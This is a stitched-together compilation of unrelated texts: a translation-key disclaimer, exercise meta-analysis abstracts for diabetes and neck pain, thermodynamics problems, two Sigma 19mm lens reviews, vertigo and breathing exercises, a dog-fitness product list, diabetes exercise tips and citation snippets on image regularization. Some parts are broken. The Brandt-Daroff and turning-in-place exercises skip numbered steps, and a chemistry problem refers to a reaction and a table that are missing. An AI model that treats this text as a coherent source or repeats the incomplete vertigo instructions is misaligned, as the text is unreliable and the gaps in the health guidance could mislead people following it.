If you are a student submitting information you find here as your own work, you are plagiarizing. Plagiarizing is bad! Your instructor will likely not approve. As even the casual user will discover, the keys have their limitations. For instance, my translations into Greek and English generally represent only one way of interpreting the originals, though sometimes I have included alternate versions placed in (parentheses) or underlined. In addition, in most cases more literal English translations have been preferred to those which sound better. As a result, many of the translations of the Readings are awkward (though usually accurate). Finally, it should be noted that though the keys have been corrected a number of times (and more often than not by Petra Axolotl, to whom I owe a great debt of gratitude), errors doubtless remain. So use with caution! And if you find a mistake, please contact me.

## Aquatic exercise for adults with type 2 diabetes: a meta-analysis

Aims: The purpose of this systematic review and meta-analysis was to examine the effects of aquatic exercise (AquaEx) on indicators of glycemic control (i.e., glycated hemoglobin [A1c] and fasting plasma glucose) in adults with type 2 diabetes mellitus (T2DM). It was hypothesized that AquaEx would improve glycemic control to a similar extent as land-based exercise (LandEx), but to a greater extent than non-exercise control (Ctrl).

Methods: A literature search was completed in February 2017 for studies examining AquaEx training in adults with T2DM. Assessment of glycemic control was necessary for inclusion, while secondary outcomes such as quality of life and cardiometabolic risk factors (i.e., blood pressure, triglycerides and total cholesterol) were considered, but not required for inclusion. Outcomes were measured before and after at least 8 weeks of AquaEx, and data were analyzed using weighted mean differences (WMDs) and fixed effect models, when appropriate.
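The "weighted mean differences and fixed effect models" mentioned in the Methods amount to standard inverse-variance pooling. The sketch below is mine, not the authors' analysis code, and the three trial results are invented purely for illustration:

```python
import math

def fixed_effect_wmd(studies):
    """Pool (mean difference, standard error) pairs with inverse-variance
    weights; return the fixed-effect WMD and its 95% confidence interval."""
    weights = [1.0 / se ** 2 for _, se in studies]
    wmd = sum(w * d for (d, _), w in zip(studies, weights)) / sum(weights)
    se = math.sqrt(1.0 / sum(weights))
    return wmd, (wmd - 1.96 * se, wmd + 1.96 * se)

# Three hypothetical trials reporting A1c mean differences (%) vs. control:
wmd, ci = fixed_effect_wmd([(-0.4, 0.20), (-0.6, 0.30), (-0.3, 0.25)])
```

More precise studies (smaller standard errors) dominate the pooled estimate, which is exactly the behavior a fixed-effect model is meant to have.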
Results: Nine trials including 222 participants were identified. Three trials compared AquaEx to LandEx, two compared AquaEx to Ctrl, and four had a pre-/post-design without a comparison group. Results indicate no difference in A1c between LandEx and AquaEx (WMD = -0.02%, 95% confidence interval = [-0.71, 0.66]). Post-intervention A1c was lower in AquaEx when compared to Ctrl (WMD = -0.96%, [-1.87, -0.05]). Post-AquaEx A1c was lower compared to baseline (WMD = -0.48%, [-0.66, -0.30]).

Conclusions: A1c can be reduced after eight to twelve weeks of AquaEx. However, at this time few studies have examined whether changes in A1c are different from LandEx or Ctrl.

Keywords: Aquatic exercise; Glycated hemoglobin; Swimming; Type 2 diabetes mellitus.

## Exercises for mechanical neck disorders: A Cochrane review update

Background: Neck pain (NP) is disabling and costly.

Objectives: To assess the effectiveness of exercise on pain, disability, function, patient satisfaction, quality of life (QoL) and global perceived effect (GPE) in adults with NP.

Methods: We searched computerised databases up to May 2014 for randomized controlled trials (RCTs) comparing exercise to a control in adults with NP with/without cervicogenic headache (CGH) or radiculopathy. Two reviewers independently conducted selection and data abstraction and assessed risk of bias. Meta-analyses were performed to establish pooled standardised mean differences (SMDp). The Grade of Recommendation, Assessment, Development and Evaluation (GRADE) was used to summarise the body of evidence.
Main results: The following exercises (27 trials) were supported by 'Moderate GRADE' evidence. For chronic NP: 1) cervico-scapulothoracic and upper extremity (UE) strengthening for moderate to large pain reduction immediately post treatment (IP) and at short-term (ST) follow-up; 2) scapulothoracic and UE endurance training for a small pain reduction (IP/ST); 3) cervical, shoulder and scapulothoracic strengthening and stretching exercise for a small to large pain reduction in the long term (LT) (SMDp -0.45 [95% CI: -0.72 to -0.18]) and function improvement; 4) cervico-scapulothoracic strengthening/stabilisation exercises for pain and function at intermediate term (IT) (SMDp -14.90 [95% CI: -22.40 to -7.39]); 5) mindfulness exercises (Qigong) for minor improved function but not GPE (ST). For chronic CGH, cervico-scapulothoracic strengthening and endurance exercises including pressure biofeedback for small/moderate improvement of pain, function and GPE (IP/LT).

Authors' conclusions: Specific strengthening exercises of the neck, scapulothoracic and shoulder for chronic NP and chronic CGH are beneficial. Future research should explore optimal dosage.

Keywords: Cochrane review; Exercise; Meta-analysis; Neck pain.

## Numerical Problems

1. Liquid nitrogen, which has a boiling point of −195.79°C, is used as a coolant and as a preservative for biological tissues. Is the entropy of nitrogen higher or lower at −200°C than at −190°C? Explain your answer. Liquid nitrogen freezes to a white solid at −210.00°C, with an enthalpy of fusion of 0.71 kJ/mol. What is its entropy of fusion? Is freezing biological tissue in liquid nitrogen an example of a reversible process or an irreversible process?
2. Using the second law of thermodynamics, explain why heat flows from a hot body to a cold body but not from a cold body to a hot body.
3. One test of the spontaneity of a reaction is whether the entropy of the universe increases: ΔSuniv > 0.
Using an entropic argument, show that the following reaction is spontaneous at 25°C: Why does the entropy of the universe increase in this reaction even though gaseous molecules, which have a high entropy, are consumed? Based on this table, can you conclude that entropy is related to the nature of functional groups? Explain your reasoning. The text states that the magnitude of ΔSvap tends to be similar for a wide variety of compounds. Based on the values in the table, do you agree?

## Sigma 19mm f/2.8 EX DN

Sigma announced that it would be providing lenses for mirrorless cameras, and the 19mm ƒ/2.8 DN ("Digital Neo") is the company's second such lens. The lens is offered in the micro four-thirds mount used by Olympus and Panasonic, and the Sony E-mount for the NEX series of cameras. On a micro four-thirds camera body, the lens offers an equivalent field of view of 38mm; on a Sony NEX camera body, it offers an equivalent field of view of just over 28mm (both figures are in 35mm film equivalent terms). The lens ships with a round lens hood, takes 46mm filters, and is available now for around $200.

Sharpness

The lens provides sharp images, more so on the micro four-thirds camera than on the Sony NEX, owing to the fact that the micro four-thirds sensor does not "see" the corners of the lens. Mounted on the Panasonic GX-1 m4/3 camera, the lens produces excellently sharp images even wide open at ƒ/2.8. There's just a hint of corner softness at ƒ/2.8, but even this is all but eliminated by just stopping down to ƒ/4. Stopping down to ƒ/5.6 technically provides more sharpness, but you'd only notice it looking very closely at a test chart. Diffraction limiting sets in at ƒ/8, but you won't notice any impact on sharpness until ƒ/16, where it is still very sharp across the frame. Fully stopped down at ƒ/22, there is some impact on sharpness, but it's still very good.
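The equivalent focal lengths quoted above are just the 19mm focal length scaled by each sensor's crop factor (2.0x for micro four-thirds, roughly 1.5x for Sony's APS-C E-mount). A quick sketch of the arithmetic, with a function name of my own choosing:

```python
def equivalent_focal_length(focal_mm: float, crop_factor: float) -> float:
    """35mm-equivalent focal length for a sensor with the given crop factor."""
    return focal_mm * crop_factor

# Micro four-thirds (2.0x crop): the 19mm frames like a 38mm lens on 35mm film.
print(equivalent_focal_length(19.0, 2.0))  # 38.0
# Sony NEX APS-C (~1.5x crop): "just over 28mm", as the review puts it.
print(equivalent_focal_length(19.0, 1.5))  # 28.5
```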
Mounted on the Sony NEX-7, the lens follows the same pattern of sharpness - very good at ƒ/2.8, excellent at ƒ/4 to ƒ/8, and softer at ƒ/16 and ƒ/22. In this case, however, we note softer corners than seen on the GX-1, owing to the larger sensor seeing more of the lens's image circle.

Chromatic Aberration

Chromatic aberration is notable with the lens attached to both camera bodies: on both, it's visible in the corners, in areas of high contrast. In images shot with the Panasonic GX-1 it appears as magenta-green fringing, and in images shot with the Sony NEX-7 it appears as magenta fringing. It gets marginally better with either camera if you stop down, but only slightly.

Shading (''Vignetting'')

With the Sigma 19mm ƒ/2.8 mounted on the Panasonic GX-1, corner shading isn't really an issue. However, when the lens is mounted on the Sony NEX-7 there is always at least a slight amount of corner shading: at ƒ/2.8, the corners are almost a half-stop darker than the center; stopped down, the corners are 1/3 EV darker than the center.

Distortion

Results for distortion testing with the Sigma 19mm ƒ/2.8 DN are the same with both cameras: there is some notable barrel distortion in the corners of the images (around +0.5%).

Autofocus Operation

The Sigma 19mm ƒ/2.8 DN uses an in-lens motor for focus and is very fast: focusing from infinity to close-focus took well less than one second. There is no extension of the lens during focus operations, and attached filters will not rotate.

Macro

This is not a lens with any significant macro capability: it offers only 0.14x magnification, with a minimum close-focusing distance of just under 8 inches (20cm).

Build Quality and Handling

The Sigma 19mm ƒ/2.8 EX DN is a fairly pedestrian lens, small and light with a matte black finish. The lens is made primarily of plastic components, weighing only 140 grams (4.9oz), with plastic 46mm filter threads and a metal lens mount. The lens has only one control on it, the manual focus ring.
There is no depth-of-field scale, distance scale or infrared index. The focusing ring is about 3/4'' wide, with deep, easy-to-grip plastic ribs. There are no stops, hard or otherwise, at the close-focusing and infinity ends of the focus range. The included lens hood is plastic, attaches via a bayonet mount, and can be reversed onto the lens for storage. The interior of the hood is ribbed, and when attached to the lens it adds about 3/4'' to the overall length.

Alternatives

$250 - For Sony users, the Sigma 19mm ƒ/2.8 offers a slightly longer alternative to the Sony 16mm ƒ/2.8. In this case the Sigma also offers a sharper alternative, with the 19mm ƒ/2.8 producing significantly sharper results throughout the same apertures. Other test results are also better: CA is better handled, there is slightly less corner shading, and distortion is a bit less severe (barrel distortion rather than pincushion).

$400 - At almost double the price of the Sigma 19mm, the Panasonic 20mm offers slightly sharper results with less CA. There is somewhat significant corner shading, but almost zero distortion.

$300 - Olympus offers a wider alternative to the Sigma, which is about on the same level optically; however, we would give the nod to the Sigma for its better tolerance to chromatic aberration and slightly sharper performance. In this case, the Olympus makes for a slightly smaller package.

Conclusion

There are a surprising number of alternatives in this category - wide primes for mirrorless cameras - so Sigma's offering comes at an interesting time. It holds its own in our tests, providing a sharp image even wide open at ƒ/2.8, with only slightly notable chromatic aberration in the corners. It's not a case of Sigma finding a niche other manufacturers haven't exploited; however, Sigma does undercut all the current manufacturers with a lower price point.
If you haven't got a wide angle prime for your micro four-thirds mirrorless camera, or your Sony NEX camera, then you may want to consider the Sigma 19mm ƒ/2.8 DN.

Product Photos

Sample Photos

The VFA target should give you a good idea of sharpness in the center and corners, as well as some idea of the extent of barrel or pincushion distortion and chromatic aberration, while the Still Life subject may help in judging contrast and color. We shoot both images using the default JPEG settings and manual white balance of our test bodies, so the images should be quite consistent from lens to lens. As appropriate, we shoot these with both full-frame and sub-frame bodies, at a range of focal lengths, and at both maximum aperture and ƒ/8. For the ''VFA'' target (the viewfinder accuracy target from Imaging Resource), we also provide sample crops from the center and upper-left corner of each shot, so you can quickly get a sense of relative sharpness without having to download and inspect the full-res images. To avoid space limitations with the layout of our review pages, indexes to the test shots launch in separate windows.

## Exercises to Help with Vertigo

Repetitive movements can help your brain and body overcome the confusing signals of vertigo. They can also help you manage the sudden onset of dizziness and motion sensations. When you begin these exercises for vertigo, start slowly and understand that initial reactions may make you feel worse. Make sure that you complete these exercises individually, taking breaks between each one. Speak with your doctor before beginning any of these exercises, and let them know if your vertigo symptoms become more serious or if you experience any new symptoms.

Brandt-Daroff Exercise

This exercise helps to reduce the symptoms of vertigo, and it is most often used for BPPV and labyrinthitis.

Step 2: Lie down on your left side and remain still for 30 seconds until dizziness fades.
Step 3: Sit up and wait 30 seconds.
Step 5: Lie down on your right side, and hold the position for 30 seconds until dizziness fades.
Step 6: Sit up and wait 30 seconds.

Repeat this process five times, twice a day or as comfort allows.

Marching in Place Exercise

Marching in place can help you with balance while standing, and it acts as a stepping stone for more advanced movements.

Step 1: Stand near a wall or corner, or place a chair nearby. Place your arms by your side.
Step 2: Lift your right knee, followed by your left knee as you march. Try to raise your knees as high as comfort allows.
Step 3: March in place 20 times.

Repeat this exercise two times a day, and try to extend each set to 30 marching steps.

Turning in Place Exercise

Turning in place is a more advanced exercise than marching in place. Make sure you have a chair or sturdy walker nearby in case you feel dizzy.

Step 2: Slowly turn left in a half-circle, equal to 180 degrees.
Step 3: Stop moving and stand motionless for 10 to 15 seconds.
Step 4: Slowly turn right in a half-circle. Stand still for 10 to 15 seconds.

Repeat this exercise five times. As you complete each round, favor moving in the direction that makes you feel dizzier.

Epley Maneuver

The Epley maneuver is one of two exercises, called canalith repositioning procedures, designed specifically for BPPV. Follow this maneuver only if you are experiencing BPPV.

Step 1: Sit at the end of your bed and turn your head 45 degrees to the right.
Step 2: Maintain that position and lie back with your head reclining and shoulders resting on a pillow. Hold for 30 seconds.
Step 3: Turn your head 90 degrees to the left and wait for 30 seconds.
Step 4: Turn your head and body 90 degrees to the left until you are face down on the bed. Hold for 30 seconds.
Step 5: Sit up on your left side.

These steps apply to the right ear. For left ear issues, reverse all directions:

Step 1: Sit at the end of your bed and turn your head 45 degrees to the left.
Step 2: Maintain that position and lie back with your head reclining and shoulders resting on a pillow. Hold for 30 seconds.
Step 3: Turn your head 90 degrees to the right and wait for 30 seconds.
Step 4: Turn your head and body 90 degrees to the right until you are face down on the bed. Hold for 30 seconds.
Step 5: Sit up on your right side.

Repeat this exercise three times or as comfort allows.

Semont Liberatory Maneuver

The Semont Liberatory maneuver is the second exercise procedure for treating BPPV.

Step 1: Sit at the end of your bed and turn your head 45 degrees to the right.
Step 2: Lie down on your left side with your head tilted upright, and hold still for 60 seconds.
Step 3: In one motion, move from your left side to your right side. Make sure your face is facing the bed. Remain still for 60 seconds.
Step 4: Return to a sitting position and sit for 5 minutes.

These steps apply to the left ear. For right ear issues, reverse all directions:

Step 1: Sit at the end of a bed and turn your head 45 degrees to the left.
Step 2: Lie down on your right side with your head tilted upright, and hold still for 60 seconds.
Step 3: In one motion, move from your right side to your left side. Make sure your face is facing the bed. Remain still for 60 seconds.
Step 4: Return to a sitting position and sit for 5 minutes.

Repeat this exercise three times or as comfort allows.

## Pursed-Lips Breathing

Pursed-lips breathing is a breathing technique designed to make your breathing more effective by making the breaths slower and more intentional. After inhaling, you pucker your lips and exhale through them slowly and deliberately, often while counting. Pursed-lips breathing has been shown to be beneficial for people with anxiety that's associated with lung conditions, such as chronic obstructive pulmonary disease (COPD) and emphysema. It can be performed up to four to five times a day.

1. Relax your neck and shoulders.
2.
Inhale slowly through the nostrils for 2 seconds (keep your mouth closed); a deep breath is unnecessary - a normal breath will do just fine.
3. Exhale through the mouth for 4 seconds (the extended time is the key). When exhaling, pucker your mouth as if giving a kiss.
4. While breathing out, keep a slow and steady breath; don't breathe out hard.

## Sigma 19mm F2.8 DN A MFT mount review: Modest price, modest performance?

With an APS-C image circle, Sigma's DN series is specifically designed for mirrorless models from Sony and the smaller MFT format adopted by both Panasonic and Olympus. Originally launched as EX types with f2.8 apertures, the firm has refreshed the original two focal lengths (a wide and a standard), designating them as part of its prestigious Art series, and added a third, a 60mm short telephoto (reviewed previously). As the wide-angle of the three, this 19mm A series lens is an upgrade of the earlier EX model of the same focal length and, with an MFT mount, is equivalent to a 38mm f2.8. Although this model features a new cosmetic appearance with a thin metal skin and minimalist exterior, internally the lens has 8 elements (with no fewer than three aspheres) in 6 groups, like its predecessor. Paradoxically, this 19mm model is larger than the 30mm model, measuring 45.7mm in length (as opposed to 40.5mm for the 30mm focal length); it focuses down to 20cm and weighs 160g. Although it lacks stabilization, the 19mm f2.8 DN A remains sensibly priced at $199.

On the Olympus OM-D E-M1, the Sigma 19mm f2.8 achieves a DxOMark score of 18 points. Although good, it's not great, putting it midway between the Lumix G 20mm f1.7 ASPH and the Olympus M.Zuiko Digital 17mm f2.8, with DxOMark scores of 22 and 15 points, respectively. However, given those models' peak sharpness scores of 11P-Mpix and 6P-Mpix, the score of 7P-Mpix for the Sigma is on the low side.
While center sharpness is best at full aperture, it doesn't really improve when stopped down, and uniformity across the field is generally poor. Lateral CA is also a little higher than we would like, being just visible in the periphery, sides and corners of the frame. Compared with its predecessor, the new model shows some marginal improvement in optical quality, particularly at full aperture, but the gains are very minor. Transmission and control of chromatic aberration are also very slightly improved, and Sigma has also lowered the distortion, suggesting the firm has fine-tuned some of the optical components. However, in real-world terms it would be difficult to tell. While it's encouraging to see Sigma upgrading the quality of their lenses, much of that on this occasion is cosmetic. That said, this model does show some slight improvement in image quality, mostly at full aperture. Sharpness isn't everything, though, and at $199 it remains competitively priced when compared with rival offerings.

Exercise is equally important for both you and your dog. Yes, there's always the standard daily walk, but there's so much more out there if you're looking to take your workouts to the next level. We've found an at-home agility course, a doggie treadmill, a hands-free bicycle leash and more products that will help you and your dog reach your fitness goals (while still having fun). Check them out below.

You can wear this around your waist. Let your pup set the pace for your walks, runs or hikes - or lead the way! Promising review: "If you run, hike or bike with your dog regularly you NEED this leash in your life! It is the absolute best! My 3 y/o 80lb labradoodle is a very active boy and likes to go everywhere we go. It's hard to keep up with his exercise needs with my own two legs, I wanted a leash that would allow me to ride my bike and this is great for that! Being hands-free is amazing."
— Kate Mahoney

You'll have your dog running back and forth while giving your arm a killer workout. (Biceps? Triceps? All of the above.) Promising review: "One of the best fetch toys out there. Exercises your dog, launches the ball far effortlessly, and can easily spot the orange ball. My 8-year-old boxer who is an obsessive-compulsive fetcher absolutely loves this." — Rintje

Use this to make your daily dog walks more exciting for you and your pup. Promising review: "These are wonderful for exercising your pup. My dog (10 months) goes and gets it and begs me to play with him. It's fun and he gets lots of exercise running and jumping." — Juliet Hart

So your dog can join the fun of your neighborhood bike rides. It's suitable for all bike models and will keep your doggo safe with a stainless steel guide pole. Promising review: "This product is helping me get back in shape! This bike leash has significantly reduced my dog's ability to knock me off my balance, which was a daily occurrence before. I highly recommend this leash." — DJ G.

Promising review: "My dog loves to play ball especially with this because he can easily grab it and run. He loves when you chase him around and try to take his ball. Very well made." — Zoe

This will give your dog a full-body workout. You can get involved too — grab the other end for a game of tug of war! Promising review: "My 8-month-old American bully loves this! Great installation instructions and extremely easy to set up! He’ll be able to get a lot of exercise from this!" — Lesa Danielson

Get you and your pups running in the yard, at the beach and everywhere in between. Promising review: "We love this disc and a pack of five is perfect for endless throwing abilities! We have a high energy weim-lab mix who is obsessed with playing frisbee. Good durability, wonderful visibility, and harm-free catching equals tons of fun for our dog and us!" — Chelsie

Perfect for the tiny pups who want to join in on your adventures!
Use this while hiking, skiing, biking, walking or even dancing. The possibilities are endless! Promising review: "Best decision I have ever made for my dogs, seriously life-changing! Thanks to this pack, me and my dogs all get more exercise. I tell people daily when I'm out walking the trails how much I love it!" — Jamie Thomsen

You'll be able to get your steps in early in the morning or at night when you have this. Promising review: "I have two large dogs who need lots of exercise, and we often walk late at night or early morning. I bought one of these harnesses three years ago just to check it out. Loved it so much I immediately bought another. Whenever we walk in the dark, they are each wearing one. We've done this for three years constantly." — Watery M

These will level up your fetch game. These balls float and are light enough to throw long distances. Promising review: "We have a lumbering Great Dane/Boxer and an energizer bunny Jack Russell/Border Collie. They both adore this ball! These are great for fetching, they float in water, they have a good bounce to them, and they hold up to a lot of intense chewing. If you have a mouthy dog, a chewer, or a fetch fanatic, this is your toy. Get several — you won't regret it!" — Amanda

You and your pup can become canoeing and kayaking voyagers with this. Promising review: "I needed to get my dog in the local lake for some swimming exercise. This is easy to get on and off of him, adjust to size, keep him afloat, and priced within my budget. It gives you peace of mind when you are in or around the water with your best canine friend." — nanjking

Promising review: "I love how compact the DogPacer is! With the side panels removed, you hardly notice it. It's relatively quiet and the track is plenty long enough for 50–65-lb dogs. Controls are simple and quick. Well worth the price!" — M.K.

With this, both you and your dog can get active outside. Build each other's agility by playing hide-and-seek, chase, fetch and more!
Promising review: "This is an awesome beginner agility set. You can set it up easily for the height you need and it is easy to put into the grass. I love that everything comes packed into two bags you can easily carry on your shoulder. They are light. Great set! Colorful and looks sturdy! Plus, you get to be physically active and have fun with your dogs, while they get physical and mental exercise, which they need!" — John L. Schieffer III

If you have a senior dog, you need this. The subtle wobble motion of these cushions helps to activate stabilizing muscles — great for rehabilitation or physical therapy! Promising review: "The pet balance disc worked so well we ended up buying a second one! We really love it and so does our dog." — Jason M.

Your dog shouldn't be left out of the FitBit club. This collar tracks your dog's location and activity levels and also notifies you when they leave home and reach their goals. Promising review: "Overall, I give this product the five stars. I was mostly interested in this as a tracker for a wayward pupper, but it does much more than this as it also tracks her fitness and general health. I would definitely purchase this item again." — Bruce E. Mitchell

This is lightweight, safe on your pets' teeth and perfect to take outside to get more active together. Promising review: "Best toy ever! My dog LOVES this thing! It’s lightweight so he can toss it, run with it and it’s so durable we can even tug with it. Will be buying a few more just in case he loses it." — Amazon Customer

Protect your pup's feet on trickier climbing trails, walks and terrain of any kind. Plus, it's made of all-natural food-grade waxes and oils! Promising review: "As the owner of a 60+ pound Catahoula who demands daily exercise the fact it's snowing or people who put rock salt down cannot deter me or him from our daily hour-long walks. So, the next best solution was that Musher's Wax. It's perfect. I cannot rate this product highly enough."
— Shannon Lew

Fill this (with the weight evenly distributed on both sides), so your dog can feel involved with your backpacking, trekking or camping trip. Promising review: "Great pack for my dog, I bought the large for my 90+ pound German shepherd. Mainly bought it for exercise, add weight to the pockets on walks and during play time. I like to take him on hikes with me, plenty of room for food, bags, water, treats etc. Overall great product, high quality material and stitching." — David Rubio

Give your dog the freedom to roam and wander without fear that they'll run away. You'll love using this on your walks to the dog park, camping or beach trips, hiking and even training! Promising review: "My dog loves this leash! This leash will allow her to get way more exercise than our 30 minute walks do. We are also in the process of training her emergency recall and I’ll be using this leash for that as well. I haven’t had it long but I feel like it’s a good investment." — NavyChiefWife

With this, you and your pup can walk, run or bike longer without them getting dehydrated. Promising review: "This water bottle has SAVED us on walks with our 4-month-old pup outside. She enjoys drinking out of this more than her own water bowl. SO convenient to carry around, leakproof and easy to clean! Highly recommend this product for all other pet humans." — Amanda Wang

## How to exercise safely with diabetes

Exercise is recommended for all people with diabetes, though some may have to take extra precautions. For example, people with type 1 diabetes should be particularly careful. "For type 1 diabetics, exercise can lower blood sugar more dramatically," Hsu says. Dangerously low blood sugar, or hypoglycemia, can cause health complications including seizures and coma in severe cases. People with type 1 diabetes should carefully plan their exercises around food intake and insulin dosage, according to the ADA.
It's also important to measure your blood sugar levels before, during, and after exercise — or check your blood sugar with a continuous glucose monitor. Overall, it's best to work with your doctor to develop a routine if you have type 1 diabetes. If you have diabetes and are starting an exercise routine, you should take the following steps: • Speak with your doctor. Let them know if you've had any other health complications with diabetes, like eye problems, heart disease, or stroke. • Start slow. Familiarize yourself with how exercise affects your blood sugar by measuring your blood sugar before and after exercise, and monitoring any major changes. Your blood sugar should stay within the healthy range that you and your doctor have established. • Monitor your feet for ulcers or sores. Many diabetics have decreased sensation in their feet, Li says, so you might not notice pain from sores. Visual monitoring can help you spot them and prevent infection.
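The range-monitoring advice above reduces to a simple comparison against target bounds. This is only an illustrative sketch — the 70–180 mg/dL defaults below are placeholder values, not medical guidance; as the text stresses, the actual healthy range is the one you establish with your doctor:

```python
def blood_sugar_status(reading_mg_dl: float,
                       low: float = 70.0, high: float = 180.0) -> str:
    """Classify a glucose reading against a target range.

    The default bounds are placeholders for illustration only.
    """
    if reading_mg_dl < low:
        return "below range"
    if reading_mg_dl > high:
        return "above range"
    return "in range"

print(blood_sugar_status(65.0))   # below range
print(blood_sugar_status(120.0))  # in range
```

Logging such a status before and after each workout is one way to see how a given exercise routine affects your readings over time.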
# Relations Between Regularization and Diffusion Filtering

## Abstract

Regularization may be regarded as diffusion filtering with an implicit time discretization where one single step is used. Thus, iterated regularization with small regularization parameters approximates a diffusion process. The goal of this paper is to analyse relations between noniterated and iterated regularization and diffusion filtering in image processing. In the linear setting, we show that with iterated Tikhonov regularization noise can be better handled than with noniterated. In the nonlinear framework, two filtering strategies are considered: total variation regularization and the diffusion filter of Perona and Malik. It is established that the Perona-Malik equation decreases the total variation during its evolution. While noniterated and iterated total variation regularization is well-posed, one cannot expect to find a minimizing sequence which converges to a minimizer of the corresponding energy functional for the Perona-Malik filter. To address this shortcoming, a novel regu...

## Citing excerpts

... These properties include well-posedness results, preservation of the average grey value, maximum-minimum principles, Lyapunov functionals, and convergence to a constant steady state. It was also possible to regard regularization methods as scale-spaces by interpreting their Euler-Lagrange equations as fully implicit discretizations of a parabolic partial differential equation with a single time step [6]. Radmoser et al. [7] have extended these results to nonstationary iterative regularization methods, where the regularization parameter can vary from iteration to iteration. ...

... Note that (1.5) immediately implies (1.6), and the relation (1.6) shows in which way the density introduced in (1.3) approximates the TV-case from (1.1). ...
As outlined in [6] or [7], we can introduce Lyapunov functionals for the nonstationary regularization methods considered here, leading to an appropriate version of Theorem 4.1 (a) in [7] with some adjustments resulting from the linear growth of F stated in (A3). In what follows, $r : [0, 1] \to \mathbb{R}$ is a function such that $r \in C^2([0, 1])$ and $r'' \ge 0$. With u(t) from Theorem 1.1 we define the Lyapunov functional ...

Article Full-text available

The TV-regularization method due to Rudin, Osher, and Fatemi is widely used in mathematical image analysis. We consider a nonstationary and iterative variant of this approach and provide a mathematical theory that extends the results of Radmoser et al. to the BV setting. While existence and uniqueness, a maximum-minimum principle, and preservation of the average grey value are not hard to prove, we also establish the convergence to a constant steady state and consider a large family of Lyapunov functionals. These properties allow us to interpret the iterated TV-regularization as a time-discrete scale-space representation of the original image.

... The minimization problem (2) was studied for different functions p; see [23] or [24]. One motivation for the representation (2) is the interpretation of the regularization term via diffusion equations. ...

... Total variation has the advantage of providing satisfactory image restoration without a priori information about the target image. On the other hand, the Perona-Malik model [16] has shown impressive results on edge preservation with a suitable contrast parameter λ and has been extended to inverse problems with applications in image restoration; see [23]. A disadvantage of the Perona-Malik model is its sensitivity to the sole parameter λ when the complexity of an image involves many different levels of contrast. ...

... While the latter two were based on partial differential equations, the former were very problem specific.
Another combination of these methods can be found in [23], where the authors analyzed regularizations and diffusion processes for image denoising, that is, the special case of A being the identity operator. In [7], the authors gave conditions on the penalty term to preserve edges, considering a single optimization problem. ...

Preprint

Building on the well-known total variation (TV), this paper develops a general regularization technique based on nonlinear isotropic diffusion (NID) for inverse problems with piecewise smooth solutions. The novelty of our approach is to be adaptive (we speak of A-NID), i.e. the regularization varies during the iterates in order to incorporate prior information on the edges, deal with the evolution of the reconstruction and circumvent the limitations due to the non-convexity of the proposed functionals. After a detailed analysis of the convergence and well-posedness of the method, the latter is validated by simulations performed on computerized tomography (CT).

... On the other hand, anisotropic diffusion is inherent to Perona-Malik (PM) filtering [28]. It is well known that the diffusion process governed by the PM equation leads to a decrease in the total variation during its evolution [34]. We thus choose the energy functional of the Perona-Malik equation for anisotropic diffusion [28]. ...

... We refer to [6,34] for a general introduction to anisotropic diffusion and a detailed discussion on the PM functional. Further, in [31], the PM model was used in the reconstruction of log-conductivities in AET and it was observed that the reconstructions obtained demonstrated superior contrast and resolution. ...

Preprint

A new non-linear optimization approach is proposed for the sparse reconstruction of log-conductivities in current density impedance imaging.
This framework comprises minimizing an objective functional involving a least-squares fit of the interior electric field data corresponding to two boundary voltage measurements, where the conductivity and the electric potential are related through an elliptic PDE arising in electrical impedance tomography. Further, the objective functional consists of an $L^1$ regularization term that promotes sparsity patterns in the conductivity and a Perona-Malik anisotropic diffusion term that enhances the edges to facilitate high contrast and resolution. This framework is motivated by a similar recent approach to solve an inverse problem in acousto-electric tomography. Several numerical experiments and comparison with an existing method demonstrate the effectiveness of the proposed method for superior image reconstructions of a wide variety of log-conductivity patterns.

... We exploit and extend connections between variational models and diffusion processes [65], and their relations to residual networks [2,63]. In contrast with our previous works [2,4], which focussed on the one-dimensional setting and corresponding numerical algorithms, we now concentrate on two-dimensional diffusion models that incorporate different strategies to achieve rotation invariance. ...

... with an increasing regulariser function Ψ which can be connected to the diffusivity g by g = Ψ′ [65]. Comparing the functional (8) to the one in (4), we have now specified the form of the regulariser to be $R(u) = \Psi\left(\operatorname{tr}\left(\nabla u\, \nabla u^\top\right)\right)$. ...

Article Full-text available

Partial differential equation models and their associated variational energy formulations are often rotationally invariant by design. This ensures that a rotation of the input results in a corresponding rotation of the output, which is desirable in applications such as image analysis. Convolutional neural networks (CNNs) do not share this property, and existing remedies are often complex.
The goal of our paper is to investigate how diffusion and variational models achieve rotation invariance and transfer these ideas to neural networks. As a core novelty, we propose activation functions which couple network channels by combining information from several oriented filters. This guarantees rotation invariance within the basic building blocks of the networks while still allowing for directional filtering. The resulting neural architectures are inherently rotationally invariant. With only a few small filters, they can achieve the same invariance as existing techniques which require a fine-grained sampling of orientations. Our findings help to translate diffusion and variational models into mathematically well-founded network architectures and provide novel concepts for model-based CNN design.

... More recently, linear scale-spaces based on pseudodifferential operators have attracted attention, such as the Poisson scale-space [20], α-scale-spaces [19], summed α-scale-spaces [14], and relativistic scale-spaces [11]. Also regularisation methods and related concepts can be interpreted as scale-spaces by considering their Euler-Lagrange equations, both in the linear and the nonlinear setting [10,13,44,50,53]. Since Gaussian scale-space can be described by a linear diffusion equation, it is natural to generalise it also to nonlinear diffusion scale-spaces [49,60]. ...

... So far, our framework requires evolutions that adhere to a semi-group property. This excludes its application to scale-spaces that do not satisfy this requirement, e.g., regularisation scale-spaces [13,44,50,53] and the closely related Bessel scale-space [10]. We will investigate whether our concepts can be extended to handle these processes as well. ...

Article Full-text available

It is well known that there are striking analogies between linear shift-invariant systems and morphological systems for image analysis.
So far, however, the relations between both system theories are mainly understood on a pure convolution/erosion level. A formal connection on the level of differential or pseudodifferential equations and their induced scale-spaces is still missing. The goal of our paper is to close this gap. We present a simple and fairly general dictionary that allows one to translate any linear shift-invariant evolution equation into its morphological counterpart and vice versa. It is based on a scale-space representation by means of the symbol of its (pseudo)differential operator. Introducing a novel transformation, the Cramér–Fourier transform, puts us in a position to relate the symbol to the structuring function of a morphological scale-space of Hamilton–Jacobi type. As an application of our general theory, we derive the morphological counterparts of many linear shift-invariant scale-spaces, such as the Poisson scale-space, α-scale-spaces, summed α-scale-spaces, relativistic scale-spaces, and their anisotropic variants. Our findings are illustrated by experiments.

... We exploit and extend connections between variational models and diffusion processes [65], and their relations to residual networks [2,63]. In contrast to our previous works [2,4], which focussed on the one-dimensional setting and corresponding numerical algorithms, we now concentrate on two-dimensional diffusion models that incorporate different strategies to achieve rotation invariance. ...

... with an increasing regulariser function Ψ which can be connected to the diffusivity g by g = Ψ′ [65]. The argument of the regulariser is the trace of the so-called structure tensor [26], here without Gaussian regularisation, which reads ...

